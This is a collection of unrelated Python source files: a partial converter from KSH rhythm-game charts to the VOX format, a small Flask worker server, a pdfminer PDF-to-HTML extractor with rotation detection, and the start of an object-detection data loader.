return '{:03},{:02},{:02}'.format(self.measure, self.beat, self.offset)
def diff(self, other, timesig):
return (self.measure - other.measure) * (timesig.ticks_per_beat() * timesig.top) \
+ (self.beat - other.beat) * timesig.ticks_per_beat() \
+ (self.offset - other.offset)
def add(self, ticks, timesig):
new = Timing(self.measure, self.beat, self.offset + ticks)
while new.offset >= timesig.ticks_per_beat():
new.offset -= timesig.ticks_per_beat()
new.beat += 1
while new.beat > timesig.top:
new.beat -= timesig.top
new.measure += 1
return new
def __eq__(self, other):
return self.measure == other.measure and self.beat == other.beat and self.offset == other.offset
def __hash__(self):
return hash((self.measure, self.beat, self.offset))
def __str__(self):
return '{},{},{}'.format(self.measure, self.beat, self.offset)
def __lt__(self, other):
return (self.measure, self.beat, self.offset) < (other.measure, other.beat, other.offset)
@dataclass()
class CameraNode:
start_param: float
end_param: float
duration: int
# TODO Use mapped_enum
class SpcParam(Enum):
""" SPCONTROLLER section param. """
def to_vox_name(self):
if self == self.ROT_X:
return 'CAM_RotX'
elif self == self.RAD_I:
return 'CAM_Radi'
elif self == self.REALIZE:
return 'Realize'
elif self == self.AIRL_SCAX:
return 'AIRL_ScaX'
elif self == self.AIRR_SCAX:
return 'AIRR_ScaX'
elif self == self.TILT:
return 'Tilt'
elif self == self.LANE_Y:
return 'LaneY'
else:
return None
def is_state(self):
return self == self.LANE_Y
@classmethod
def from_ksh_name(cls, ksh_name):
if ksh_name == 'zoom_top':
return cls.ROT_X
elif ksh_name == 'zoom_bottom':
return cls.RAD_I
elif ksh_name == 'tilt':
return cls.TILT
elif ksh_name == 'lane_toggle':
return cls.LANE_Y
else:
return None
def from_ksh_value(self, val:float=0):
# Convert the ksh value to the one that will be printed to the vox.
if self == self.ROT_X:
return val / 150.0
elif self == self.RAD_I:
return val / -150.0
elif self == self.TILT:
return -val
elif self == self.LANE_Y:
return float(val)
return None
ROT_X = auto()
RAD_I = auto()
REALIZE = auto()
AIRL_SCAX = auto()
AIRR_SCAX = auto()
TILT = auto()
LANE_Y = auto()
@classmethod
def line_is_abnormal(cls, param, splitted):
cell = lambda i: splitted[i].strip()
if param == SpcParam.REALIZE:
if cell(2) == '3':
return cell(4) != '36.12' or cell(5) != '60.12' or cell(6) != '110.12' or cell(7) != '0.00'
elif cell(2) == '4':
return cell(4) != '0.62' or cell(5) != '0.72' or cell(6) != '1.03' or cell(7) != '0.00'
return False
# TODO Other params maybe
class KshFilter(Enum):
def to_vox_filter_id(self):
# TODO Correct this so filter indices line up with the TAB EFFECT INFO instead of being hardcoded
if self == self.PEAK:
return 0
elif self == self.LOWPASS:
return 1 # or 2
elif self == self.HIGHPASS:
return 3 # or 4
elif self == self.BITCRUSH:
return 5
elif self == self.PEAK:
# TODO Figure out how effect 6 (and up?) is assigned.
return 6
raise ValueError(f'unrecognized vox filter id {self}')
@classmethod
def from_ksh_name(cls, ksh_name):
if ksh_name == 'peak':
return cls.PEAK
elif ksh_name == 'lpf1':
return cls.LOWPASS
elif ksh_name == 'hpf1':
return cls.HIGHPASS
elif ksh_name == 'bitc':
return cls.BITCRUSH
PEAK = auto()
LOWPASS = auto()
HIGHPASS = auto()
BITCRUSH = auto()
# TODO what uhhhhh the fuck is any of this
class KshEffectDefine:
def __init__(self):
self.effect = None
self.main_param = None
self.params = {}
def define_line(self, index):
param_str = ''
for k, v in self.params.items():
param_str += f';{k}={v}'
return f'#define_fx {index} type={self.effect.to_ksh_simple_name()}{param_str}'
def fx_change(self, index, duration=0):
if self.effect == ksh_effects.KshEffectKind.TAPESTOP:
# Math lol
extra = f';{int(2500 / (duration + 10))}'
else:
extra = f';{self.main_param}' if self.main_param is not None else ''
return f'{index}{extra}'
@classmethod
def from_pre_v4_vox_sound_id(cls, sound_id):
"""Generate an effect definition line from the old-style effect declaration."""
effect = None
main_param = None
from ksh_effects import KshEffectKind as Kind
if sound_id == 2:
effect = Kind.RETRIGGER
main_param = '8'
elif sound_id == 3:
effect = Kind.RETRIGGER
main_param = '16'
elif sound_id == 4:
effect = Kind.GATE
main_param = '16'
elif sound_id == 5:
effect = Kind.FLANGER
main_param = '200'
elif sound_id == 6:
effect = Kind.RETRIGGER
main_param = '32'
elif sound_id == 7:
effect = Kind.GATE
main_param = '8'
elif sound_id == 8:
effect = Kind.PITCHSHIFT
main_param = '8' # TODO Tweak
elif sound_id > 8:
debug().record(Debug.Level.WARNING, 'fx_parse', f'old vox sound id {sound_id} unknown')
return ksh_effects.KshEffect(effect, main_param=main_param) \
if effect is not None and main_param is not None \
else cls.default_effect()
@classmethod
def default_effect(cls):
define = ksh_effects.KshEffect(ksh_effects.KshEffectKind.FLANGER, main_param='200')
define.params['depth'] = f'{define.main_param}samples'
return define
@classmethod
def from_effect_info_line(cls, line):
splitted = line.replace('\t', '').split(',')
if splitted[0] == '1':
return ksh_effects.RetriggerEffect(*splitted[1:])
elif splitted[0] == '2':
return ksh_effects.GateEffect(*splitted[1:])
elif splitted[0] == '3':
return ksh_effects.PhaserEffect(*splitted[1:])
elif splitted[0] == '4':
return ksh_effects.TapestopEffect(*splitted[1:])
elif splitted[0] == '5':
return ksh_effects.SidechainEffect(*splitted[1:])
elif splitted[0] == '6':
return ksh_effects.WobbleEffect(*splitted[1:])
elif splitted[0] == '7':
return ksh_effects.BitcrusherEffect(*splitted[1:])
elif splitted[0] == '8':
return ksh_effects.UpdateableRetriggerEffect(*splitted[1:])
elif splitted[0] == '9':
return ksh_effects.PitchshiftEffect(*splitted[1:])
elif splitted[0] == '11':
return ksh_effects.LowpassEffect(*splitted[1:])
elif splitted[0] == '12':
return ksh_effects.FlangerEffect(*splitted[1:])
else:
raise ValueError(f'effect define id {splitted[0]} is not supported')
class Button(Enum):
def is_fx(self):
return self == Button.FX_L or self == Button.FX_R
@classmethod
def from_track_num(cls, num: int):
try:
return next(x for x in cls if x.value == num)
except StopIteration as err:
if num != 9:
raise ValueError(f'invalid track number for button: {num}') from err
def to_track_num(self):
return self.value
BT_A = 3
BT_B = 4
BT_C = 5
BT_D = 6
FX_L = 2
FX_R = 7
@dataclass()
class ButtonPress:
button: Button
duration: int
effect: int
class LaserSide(Enum):
LEFT = 'l', 1
RIGHT = 'r', 8
def to_letter(self):
return self.value[0]
def to_track_num(self):
return self.value[1]
class LaserCont(Enum):
""" The continuity status of a laser node. """
CONTINUE = 0
START = 1
END = 2
class RollKind(Enum):
MEASURE = 1
HALF_MEASURE = 2
THREE_BEAT = 3
CANCER = 4
SWING = 5
class LaserNode:
@dataclass()
class Builder:
side: LaserSide = None
position: int = None
node_type: LaserCont = None
range: int = 1
filter: KshFilter = KshFilter.PEAK
roll_kind: RollKind = None
def __init__(self, builder: Builder):
self.side: LaserSide = builder.side
self.position: int = builder.position
self.node_cont: LaserCont = builder.node_type
self.range: int = builder.range
self.filter: KshFilter = builder.filter
self.roll_kind: RollKind = builder.roll_kind
if self.position < 0 or self.position > 127:
raise ValueError(f'position {self.position} is out of bounds')
@staticmethod
def position_ksh(position):
""" Convert the position from whatever the hell KSM is using to the 7-bit scale. """
chars = []
for char in range(10):
chars.append(chr(ord('0') + char))
for char in range(24):
chars.append(chr(ord('A') + char))
for char in range(15):
chars.append(chr(ord('a') + char))
idx = chars.index(position)
return (idx / (len(chars) - 1)) * 127
class LaserSlam:
class Direction(Enum):
LEFT = auto()
RIGHT = auto()
def __init__(self, start: LaserNode, end: LaserNode):
self.start: LaserNode = start
self.end: LaserNode = end
if self.start.position == self.end.position:
raise ValueError('attempt to create a slam with the same start and end')
elif self.start.side != self.end.side:
raise ValueError('attempt to create a slam with start and end having different sides')
def direction(self):
if self.start.position > self.end.position:
return self.Direction.LEFT
else:
return self.Direction.RIGHT
def side(self):
return self.start.side
class Difficulty(Enum):
NOVICE = 0, 'n', 'novice', 'nov'
ADVANCED = 1, 'a', 'challenge', 'adv'
EXHAUST = 2, 'e', 'extended', 'exh'
INFINITE = 3, 'i', 'infinite', 'inf'
MAXIMUM = 4, 'm', 'infinite', 'mxm'
@classmethod
def from_letter(cls, k):
return next(x for x in cls if x.value[1] == k)
def to_letter(self):
return self.value[1]
@classmethod
def from_number(cls, num):
try:
return next(x for x in cls if x.value[0] == num)
except StopIteration:
# TODO Error handling.
return None
@classmethod
def from_ksh_name(cls, k):
return next(x for x in cls if x.value[2] == k)
def to_ksh_name(self):
return self.value[2]
def to_xml_name(self):
return self.name.lower()
def to_jacket_ifs_numer(self):
return self.value[0] + 1
def to_abbreviation(self):
return self.value[3]
class InfiniteVersion(Enum):
INFINITE = 2, 'inf'
GRAVITY = 3, 'grv'
HEAVENLY = 4, 'hvn'
VIVID = 5, 'vvd'
@classmethod
def from_inf_ver(cls, num):
try:
return next(x for x in cls if x.value[0] == num)
except StopIteration:
return None
def to_abbreviation(self):
return self.value[1]
class TiltMode(Enum):
NORMAL = auto()
BIGGER = auto()
KEEP_BIGGER = auto()
def to_vox_id(self):
if self == self.NORMAL:
return 0
elif self == self.BIGGER:
return 1
elif self == self.KEEP_BIGGER:
return 2
@classmethod
def from_ksh_name(cls, ksh_name):
if ksh_name == 'normal':
return cls.NORMAL
elif ksh_name == 'bigger':
return cls.BIGGER
elif ksh_name == 'keep_bigger':
return cls.KEEP_BIGGER
class StopEvent:
moment: Timing
timesig: TimeSignature
class EventKind(Enum):
TRACK = auto()
TIMESIG = auto()
BPM = auto()
TILTMODE = auto()
SPCONTROLLER = auto()
STOP = auto()
class Background:
# As of 2020-01-12, using the definitions from Lasergame.
@staticmethod
def to_vox_id(ksh_id):
if ksh_id == 'techno':
return 0 # or 1, or 14..16, or 71
elif ksh_id == 'wave':
return 2 # or 6, or 11..13
elif ksh_id == 'arrow':
return 3 # or 7
elif ksh_id == 'sakura':
# TODO It should've been kinda a pink version of 'wave'
return 4 # or 8
elif ksh_id == 'smoke':
return 63
elif ksh_id == 'snow':
return 65
class KshLine:
""" Represents a single line of notes in KSH (along with effect assignment lines) """
class ButtonState(Enum):
NONE = auto()
PRESS = auto()
HOLD = auto()
def __init__(self, line):
buttons, fx, lasers_and_spin = line.split('|')
self.buttons = {}
for bt, state in zip([ Button.BT_A, Button.BT_B, Button.BT_C, Button.BT_D ], buttons):
if state == '2':
self.buttons[bt] = self.ButtonState.HOLD
elif state == '1':
self.buttons[bt] = self.ButtonState.PRESS
else:
self.buttons[bt] = self.ButtonState.NONE
for bt, state in zip([ Button.FX_L, Button.FX_R ], fx):
if state == '1':
self.buttons[bt] = self.ButtonState.HOLD
elif state == '2':
self.buttons[bt] = self.ButtonState.PRESS
else:
self.buttons[bt] = self.ButtonState.NONE
lasers = lasers_and_spin[:2]
spin = lasers_and_spin[2:]
self.lasers = {}
for laser, state in zip([ LaserSide.LEFT, LaserSide.RIGHT ], lasers):
self.lasers[laser] = state
self.spin = spin
class Ksh:
def __init__(self):
self.kshfile = None
self.source_file_name = None
self.vox_defines = {} # defined in the vox file
self.ksh_defines = {} # will be defined in the ksh file
self.effect_fallback = KshEffectDefine.default_effect()
self.events = defaultdict(dict)
self.stop_point = None
self.metadata = dict()
self.finalized = False
self.required_chip_sounds = set()
def diff(self):
return Difficulty.from_ksh_name(self.metadata['difficulty'])
def vox_name(self):
title = to_path(self.metadata['title'])
artist = to_path(self.metadata['artist'])
difficulty = Difficulty.from_ksh_name(self.metadata['difficulty']).to_letter()
return f'{title}_{artist}_{difficulty}.vox'
@classmethod
def from_file(cls, path):
global args
parser = Ksh()
file = open(path, 'r')
parser.kshfile = file
parser.source_file_name = os.path.split(path)[-1]
return parser
def parse(self):
line_no = 0
is_metadata = True
now = Timing(1, 1, 0)
timesig = TimeSignature(4, 4)
holds = dict()
for line in self.kshfile:
line_no += 1
debug().current_line_num = line_no
line = line.strip().lstrip('\ufeff') # fucking BOM
if line.startswith('//'):
continue
if line == '--' and is_metadata:
is_metadata = False
if is_metadata:
key, value = line.split('=', 1)
self.metadata[key] = value
continue
if line == '--':
if now.beat != 1 or now.offset != 0:
print('warning: ticks per beat probably incorrect')
now = Timing(now.measure + 1, 1, 0)
elif line.startswith('beat='):
_, sig = line.split('=')
top, bottom = sig.split('/')
timesig = TimeSignature(int(top), int(bottom))
self.events[now][EventKind.TIMESIG] = timesig
elif line.startswith('t='):
_, val = line.split('=')
self.events[now][EventKind.BPM] = float(val)
elif line.startswith('stop='):
_, stop = line.split('=')
self.events[now][EventKind.STOP] = int(stop)
elif line.startswith('tilt='):
_, tilt = line.split('=')
self.events[now][EventKind.TILTMODE] = TiltMode.from_ksh_name(tilt)
#elif SpcParam.from_ksh_name(line.split('=')[0]) is not None:
# raise NotImplementedError('SP Controller things are over my head')
elif '=' in line:
raise KshParseError('what even is a ' + line)
else:
ksh_line = KshLine(line)
slam = False
roll_kind = None
direction = None
if ksh_line.spin != '':
slam = True
roll_kind_code = ksh_line.spin[1]
if roll_kind_code in '()':
roll_kind = RollKind.MEASURE # or something
if roll_kind_code == '(':
direction = LaserSlam.Direction.LEFT
else:
direction = LaserSlam.Direction.RIGHT
elif roll_kind_code in '<>':
roll_kind = RollKind.SWING
if roll_kind_code == '<':
direction = LaserSlam.Direction.LEFT
else:
direction = LaserSlam.Direction.RIGHT
for side in LaserSide:
if ksh_line.lasers[side] not in '-:': # TODO figure out what to do about :
track = side.to_track_num()
laser = LaserNode.Builder()
laser.side = side
laser.position = LaserNode.position_ksh(ksh_line.lasers[side])
laser.node_type = LaserCont.START
if slam:
laser.roll_kind = roll_kind
laser_start = LaserNode(laser)
laser.position += -1 if direction == LaserSlam.Direction.LEFT else 1
laser.node_type = LaserCont.END
laser_end = LaserNode(laser)
event = LaserSlam(laser_start, laser_end) # TODO what uhhh the fuck, TODO persist for later
self.events[now][(EventKind.TRACK, track)] = event
else:
laser = LaserNode(laser)
self.events[now][(EventKind.TRACK, track)] = laser
for button in Button:
if ksh_line.buttons[button] == KshLine.ButtonState.PRESS:
self.events[now][(EventKind.TRACK, button.to_track_num())] = ButtonPress(button, 0, 3) # TODO effects
elif ksh_line.buttons[button] == KshLine.ButtonState.HOLD:
if button not in holds:
holds[button] = now
elif button in holds:
start = holds[button]
event = ButtonPress(button, now.diff(start, timesig), 3) # TODO effects
del holds[button]
self.events[start][(EventKind.TRACK, button.to_track_num())] = event
now = now.add(VOX_TICKS_PER_BEAT // KSH_TICKS_PER_BEAT, timesig)
# TODO effect defines
self.finalized = True
def write_to_vox(self, file=sys.stdout):
def p(*args, **kwargs):
print(*args, **kwargs, file=file)
p('// made by ksh2vox')
p('')
p('#FORMAT VERSION')
p('10')
p('#END')
p('')
p('#BEAT INFO')
for now, events in self.events.items():
if EventKind.TIMESIG in events:
event = events[EventKind.TIMESIG]
p(f'{now.to_time_str()}\t{event.top}\t{event.bottom}')
p('#END')
p('')
p('#BPM INFO')
for now, events in self.events.items():
if EventKind.BPM in events:
# TODO what the fuck is a stop event
bpm = events[EventKind.BPM]
p(f'{now.to_time_str()}\t{bpm}\t4')
p('#END')
p('')
p('#TILT MODE INFO')
for now, events in self.events.items():
if EventKind.TILTMODE in events:
mode = events[EventKind.TILTMODE].to_vox_id()
p(f'{now.to_time_str()}\t{mode}')
p('#END')
p('')
p('#LYRIC INFO')
p('#END')
p('')
p('#END POSITION')
end = max(self.events.keys())
p(f'{end.to_time_str()}')
p('#END')
p('')
p('#TAB EFFECT INFO')
p('1,\t90.00,\t400.00,\t18000.00,\t0.70')
p('1,\t90.00,\t600.00,\t15000.00,\t5.00')
p('2,\t90.00,\t40.00,\t5000.00,\t0.70')
p('2,\t90.00,\t40.00,\t2000.00,\t3.00')
p('3,\t100.00,\t30')
p('#END')
p('')
p('#FXBUTTON EFFECT INFO')
# TODO is this really supposed to be hard coded
p('''1,\t4,\t95.00,\t2.00,\t1.00,\t0.85,\t0.15
0,\t0,\t0,\t0,\t0,\t0,\t0
1,\t8,\t95.00,\t2.00,\t1.00,\t0.75,\t0.10
0,\t0,\t0,\t0,\t0,\t0,\t0
2,\t98.00,\t8,\t1.00
0,\t0,\t0,\t0,\t0,\t0,\t0
3,\t75.00,\t2.00,\t0.50,\t90,\t2.00
0,\t0,\t0,\t0,\t0,\t0,\t0
1,\t16,\t95.00,\t2.00,\t1.00,\t0.87,\t0.13
0,\t0,\t0,\t0,\t0,\t0,\t0
2,\t98.00,\t4,\t1.00
0,\t0,\t0,\t0,\t0,\t0,\t0
1,\t4,\t100.00,\t4.00,\t0.60,\t1.00,\t0.85
0,\t0,\t0,\t0,\t0,\t0,\t0
4,\t100.00,\t8.00,\t0.40
0,\t0,\t0,\t0,\t0,\t0,\t0
5,\t90.00,\t1.00,\t45,\t50,\t60
0,\t0,\t0,\t0,\t0,\t0,\t0
6,\t0,\t3,\t80.00,\t500.00,\t18000.00,\t4.00,\t1.40
0,\t0,\t0,\t0,\t0,\t0,\t0
1,\t6,\t95.00,\t2.00,\t1.00,\t0.85,\t0.15
0,\t0,\t0,\t0,\t0,\t0,\t0
7,\t100.00,\t12
0,\t0,\t0,\t0,\t0,\t0,\t0''')
p('#END')
p('')
p('#TAB PARAM ASSIGN INFO')
# TODO does this number mean anything
for _ in range(24):
p('0,\t0,\t0.00,\t0.00')
p('#END')
p('')
p('#REVERB EFFECT PARAM')
p('#END')
p('')
def laser_track(i):
p('#TRACK' + str(i))
for now, events in self.events.items():
if (EventKind.TRACK, i) in events:
event = events[(EventKind.TRACK, i)]
if isinstance(event, LaserSlam):
lasers = [event.start, event.end]
else:
lasers = [event]
for laser in lasers:
position = int(laser.position)
node_type = laser.node_cont.value
if laser.roll_kind is None:
roll_kind = 0
else:
roll_kind = laser.roll_kind.value
# TODO filter and range
p(f'{now.to_time_str()}\t{position}\t{node_type}\t{roll_kind}')
p('#END')
p('')
def button_track(i):
p('#TRACK' + str(i))
for now, events in self.events.items():
if (EventKind.TRACK, i) in events:
event: ButtonPress = events[(EventKind.TRACK, i)]
duration = int(event.duration)
if event.button.is_fx():
if duration > 0:
fx_data = event.effect + 2
else:
fx_data = event.effect
p(f'{now.to_time_str()}\t{duration}\t{fx_data}')
else:
p(f'{now.to_time_str()}\t{duration}')
p('#END')
p('')
laser_track(1)
button_track(2)
button_track(3)
button_track(4)
button_track(5)
button_track(6)
button_track(7)
laser_track(8)
p('#TRACK AUTO TAB')
p('#END')
p('')
p('#SPCONTROLER') # [sic]
# TODO this probably shouldn't be hardcoded
p('''001,01,00\tAIRL_ScaX\t1\t0\t0.00\t1.00\t0.00\t0.00
001,01,00\tAIRR_ScaX\t1\t0\t0.00\t2.00\t0.00\t0.00
001,01,00\tRealize\t3\t0\t17.12\t60.12\t110.12\t0.00
001,01,00\tRealize\t4\t0\t0.28\t0.72\t1.57\t0.00''')
p('#END')
p('')
def close(self):
self.kshfile.close()
thread_id_index = {}
def thread_print(line):
if threading.get_ident() not in thread_id_index:
thread_id_index[threading.get_ident()] = len(thread_id_index) + 1
print(f'{thread_id_index[threading.get_ident()]}> {line}')
def do_process_kshfiles(files):
global args
# Load source directory.
for ksh_path in files:
try:
debug().state = Debug.State.INPUT
debug().input_filename = ksh_path
debug().output_filename = None
debug().reset()
# noinspection PyBroadException
try:
ksh = Ksh.from_file(ksh_path)
except Exception:
debug().record_last_exception(level=Debug.Level.ERROR, tag='ksh_load')
continue
thread_print(f'Processing "{ksh_path}"')
start_time = time.time()
# First try to parse the file.
try:
ksh.parse()
except Exception as e:
thread_print(f'Parsing ksh file failed with "{str(e)}":\n{traceback.format_exc()}')
debug().record_last_exception(level=Debug.Level.ERROR, tag='ksh_parse', trace=True)
continue
# Make the output directory.
song_dir = f'out/{to_path(ksh.metadata["title"])}'
if not os.path.isdir(song_dir):
thread_print(f'Creating song directory "{song_dir}".')
os.mkdir(song_dir)
# Output the VOX chart.
chart_path = f'{song_dir}/{ksh.vox_name()}'
debug().output_filename = chart_path
debug().state = Debug.State.OUTPUT
thread_print(f'Writing VOX data to "{chart_path}".')
with open(chart_path, "w+", encoding='utf-8') as ksh_file:
try:
ksh.write_to_vox(file=ksh_file)
except Exception as e:
print(f'Outputting to vox failed with "{str(e)}"\n{traceback.format_exc()}\n')
debug().record_last_exception(level=Debug.Level.ERROR, tag='vox_output', trace=True)
continue
duration = time.time() - start_time
if debug().has_issues():
exceptions = debug().exceptions_count
thread_print(f'Finished conversion in {truncate(duration, 4)}s with {exceptions[Debug.Level.ABNORMALITY]} abnormalities, {exceptions[Debug.Level.WARNING]} warnings, and {exceptions[Debug.Level.ERROR]} errors.')
else:
thread_print(f'Finished conversion in {truncate(duration, 4)}s with no issues.')
ksh.close()
except Exception as e:
debug().record_last_exception(Debug.Level.ERROR, 'other', f'an error occurred: {str(e)}')
def debug():
global debugs
if threading.get_ident() not in debugs:
debugs[threading.get_ident()] = Debug(f'debug/exceptions_{threading.get_ident()}.txt')
return debugs[threading.get_ident()]
##############
# PROGRAM RUNTIME BEGINS BELOW
#############
args = None
debugs = {}
def main():
if not os.path.exists('config.ini'):
print('Please create a config.ini based off the provided sample.', file=sys.stderr)
sys.exit(1)
global args
argparser = argparse.ArgumentParser(description='Convert ksh to vox')
argparser.add_argument('-j', '--num-cores', default=1, type=int)
argparser.add_argument('-i', '--song-id')
argparser.add_argument('-d', '--song-difficulty')
argparser.add_argument('-n', '--no-media', action='store_false', dest='do_media')
argparser.add_argument('-m', '--no-convert', action='store_false', dest='do_convert')
argparser.add_argument('-x', '--no-merge-db', action='store_false', dest='multi_db')
argparser.add_argument('-K', '--ksh-dir', default='D:/SDVX-Import/ksh')
argparser.add_argument('-D', '--db-dir', default='D:/SDVX-Import/music_db')
argparser.add_argument('-A', '--audio-dir', default='D:/SDVX-Import/song_prepared')
argparser.add_argument('-C', '--fx-chip-sound-dir', default='D:/SDVX-Import/fx_chip_sound')
argparser.add_argument('-J', '--jacket-dir', default='D:/SDVX-Import/jacket')
argparser.add_argument('-P', '--preview-dir', default='D:/SDVX-Import/preview')
argparser.add_argument('-c', '--clean-output', action='store_true', dest='do_clean_output')
argparser.add_argument('-e', '--clean-debug', action='store_true', dest='do_clean_debug')
args = argparser.parse_args()
# Create output directory.
if args.do_clean_output:
print('Cleaning directory of old charts.')
shutil.rmtree('out')
if not os.path.exists('out'):
print(f'Creating output directory.')
os.mkdir('out')
if args.do_clean_debug:
print('Cleaning directory of debug output.')
shutil.rmtree('debug')
if not os.path.exists('debug'):
print(f'Creating debug output directory.')
os.mkdir('debug')
candidates = []
print(f'Finding ksh files.')
for filename in glob(f'{args.ksh_dir}/*.ksh'):
import re
if args.song_id is None or \
(args.song_id is not None and f'_{args.song_id.zfill(4)}_' in filename):
if args.song_difficulty is None or splitx(filename)[0][-1] == args.song_difficulty:
# See if this is overriding an earlier game's version of the chart.
try:
prev: str = next(filter(lambda n: n.split('_')[1] == filename.split('_')[1] and splitx(n)[0][-1] == splitx(filename)[0][-1], candidates))
if int(prev.split('_')[1]) < int(filename.split('_')[1]):
candidates.remove(prev)
else:
continue
except StopIteration:
# Not clashing with anything.
pass
except (IndexError, ValueError):
# Malformed file name.
pass
candidates.append(filename)
print('The following files will be processed:')
for f in candidates:
print(f'\t{f}')
groups = [[] for _ in range(args.num_cores)]
for i, candidate in enumerate(candidates):
try:
song_id = os.path.basename(candidate).split('_')[1]
groups[int(song_id) % args.num_cores].append(candidate)
except (ValueError, IndexError):
groups[i % args.num_cores].append(candidate)
threads = []
global debugs
for i in range(args.num_cores):
thread = threading.Thread(target=do_process_kshfiles, args=(groups[i],), name=f'Thread-{i}')
threads.append(thread)
print(f'Performing conversion across {args.num_cores} threads.')
for t in threads:
t.start()
for t in threads:
t.join()
for d in debugs.values():
d.close()
if __name__ == '__main__':
main()
|
main.py
|
import importlib
import os
from functools import partial
from multiprocessing import Process, Queue
from flask import Flask, request
app = Flask("serverfull")
workers = {}
def load_bees_module_names():
exclude = set(["__pycache__"])
bee_modules = filter(
os.path.isdir, [
os.path.join("./bees/", module) for module in os.listdir("./bees/")
]
)
bee_modules = set(map(os.path.basename, bee_modules))
bee_modules = bee_modules.difference(exclude)
return list(bee_modules)
bees = load_bees_module_names()
def bee_loop(handler, inq, outq):
request = inq.get()
print("Got request")
outq.put(handler(request))
def generic_handler(bee_path):
_, inq, outq = workers[bee_path]
print(f"Putting {request.args}")
inq.put(request.args)
return outq.get()
for bee in bees:
bee_path = f"bees.{bee}"
print(f"Importing {bee_path}")
bee_mod = importlib.import_module(bee_path)
bee_mod = importlib.reload(bee_mod) # TODO: be smarter, but who cares
print(f"/bees/{bee} => {bee_mod.handler}")
inq = Queue()
outq = Queue()
proc = Process(target=bee_loop, args=(bee_mod.handler, inq, outq))
proc.start()
workers[bee_path] = [proc, inq, outq]
app.add_url_rule(f"/bees/{bee}", f"bee.{bee}", partial(generic_handler, (bee_path)))
|
txt_ext.py
|
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import HTMLConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
from io import BytesIO
def countRotated(text):
"""Counts the number of ocurrences of '\w\n' in text.
Args:
text (string): text that is going to be processed.
Returns:
int: number of ocurrences
"""
return len(re.findall(r'\w\n', text))
def process_without_detect_vertical(interpreter, retstr, page, return_dict):
"""Processes page and return in shared variable the number of
countRotated ocurrences.
Args:
interpreter (PDFPageInterpreter): PDFPageInterpreter object.
retstr (BytesIO): BytesIO object.
page (PDFPage): PDFPage object.
return_dict (Manager.dict()): Manager.dict() object.
"""
t_start = time.process_time()
interpreter.process_page(page)
t_elapsed = time.process_time() - t_start
print("elapsed 2: ", t_elapsed)
return_dict[0] = countRotated(retstr.getvalue().decode("utf-8")) + 1
def extract_pdf_to_html(path, check_rotated = False):
"""Extracts text from PDF document to HTML format.
When check_rotated is True, pages are processed a second time
to ensure they are in the correct orientation. If not, the page
is rotated 90 degrees clockwise and processed again. This may slow
down the whole process more than a 100%.
Args:
path (string): path where pdf file is stored
check_rotated (bool, optional): check rotated pages. Defaults to False.
Returns:
string: document in html format
"""
# Declare PDFMiner variables for extraction (with detect_vertical ON)
_rsrcmgr = PDFResourceManager()
_retstr = BytesIO()
_codec = 'utf-8'
_laparams = LAParams(detect_vertical=True)
_device = HTMLConverter(_rsrcmgr, _retstr, laparams=_laparams)
_file = open(path, 'rb')
_interpreter = PDFPageInterpreter(_rsrcmgr, _device)
_password = '' # Set empty password as default value
_pagenos=set() # empty page set
# Declare PDFMiner variables for extraction (with detect_vertical OFF)
_rsrcmgr_default = PDFResourceManager()
_retstr_default = BytesIO()
_laparams_default = LAParams() # detect_vertical=False
_device_default = HTMLConverter(_rsrcmgr_default, _retstr_default, laparams=_laparams_default)
_interpreter_default = PDFPageInterpreter(_rsrcmgr_default, _device_default)
# Variable where text is going to be stored
_text = b""
if(check_rotated):
# Import necessary libraries for rotation checking
import re
import time
from multiprocessing import Process, Manager
# Iterate through PDF document pages
for number,page in enumerate(PDFPage.get_pages(_file, _pagenos ,password=_password, check_extractable=True)):
#print("Extracting page: ", number)
rotating = False
# If checking page rotation
if(check_rotated):
# Start to measure time
t_start = time.process_time()
# Analyze with detect_vertical
_interpreter.process_page(page)
# If checking page rotation
if(check_rotated):
# Elapsed time
t_elapsed = time.process_time() - t_start
#print("elapsed 1: ", t_elapsed)
#print("countRotated", countRotated(_retstr.getvalue().decode("utf-8")))
# Number of ocurrences of "rotated characters"
num_occ = countRotated(_retstr.getvalue().decode("utf-8")) + 1
# Set timeout based on elapsed time using detect_vertical processing
_timeout = 5 + t_elapsed * 10
max_timeout = 60 # seconds
_timeout = min(max_timeout, _timeout)
#_timeout = 100000
#print("timeout: ", _timeout)
# Create shared variable
manager = Manager()
return_dict = manager.dict()
# Re-execute page interpreter in another thread
action_process = Process(target=process_without_detect_vertical, args=(_interpreter_default, _retstr_default, page, return_dict,))
action_process.start()
action_process.join(timeout=_timeout)
# If thread is still active
if action_process.is_alive():
# Terminate
action_process.terminate()
action_process.join()
#print("Ran out of time")
rotating = True
else:
# Get number of occurences
num_occ_default = return_dict[0]
#print("num_occ_default", num_occ_default)
# Check if page needs to be rotated
if(num_occ_default / num_occ > 5 and num_occ_default > 100):
rotating = True
if(rotating):
#print("Rotating")
# Clean buffer
_retstr.truncate(0)
_retstr.seek(0)
# Rotate page
page.rotate = (page.rotate+90) % 360
# Analyze again with detect_vertical
_interpreter.process_page(page)
# Append new text
_text += _retstr.getvalue()
# Clean buffers
_retstr.truncate(0)
_retstr.seek(0)
_retstr_default.truncate(0)
_retstr_default.seek(0)
#print("Extraction finished")
_text += b'\n\n'
# Close files
_file.close()
_device.close()
_retstr.close()
return _text.decode("utf-8")
|
data.py
|
import cv2
import glob
import os
import multiprocessing
import time
import numpy as np
from utils.generate_priors import generate_priors
from utils.assign_boxes import assign_boxes
from utils.augment import augment
class Data:
def __init__(self, image_dir, label_dir, num_classes, input_size, shapes, assignment_threshold):
self.image_dir = image_dir
self.label_dir = label_dir
self.num_classes = num_classes
self.input_size = input_size
self.assignment_threshold = assignment_threshold
self.priors = generate_priors(image_size=self.input_size, shapes=shapes)
self.size = self.get_size()
def start(self):
self.q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.put, args=(self.q,))
p.start()
def get_paths(self):
paths = []
for bb_path in glob.glob(os.path.join(self.label_dir, '*.txt')):
im_path = os.path.join(self.image_dir, os.path.splitext(os.path.basename(bb_path))[0] + '.jpg')
if os.path.exists(im_path):
paths.append([im_path, bb_path])
return paths
def get_size(self):
return len(self.get_paths())
def put(self, q):
queue_max_size = 1000
paths = []
while True:
if len(paths) == 0:
paths = self.get_paths()
if q.qsize() >= queue_max_size:
time.sleep(0.1)
continue
ix = np.random.randint(0, len(paths))
path = paths.pop(ix)
im_path, bb_path = path
npimg = np.fromfile(im_path, dtype=np.uint8)
img = cv2.imdecode(npimg, cv2.IMREAD_COLOR)
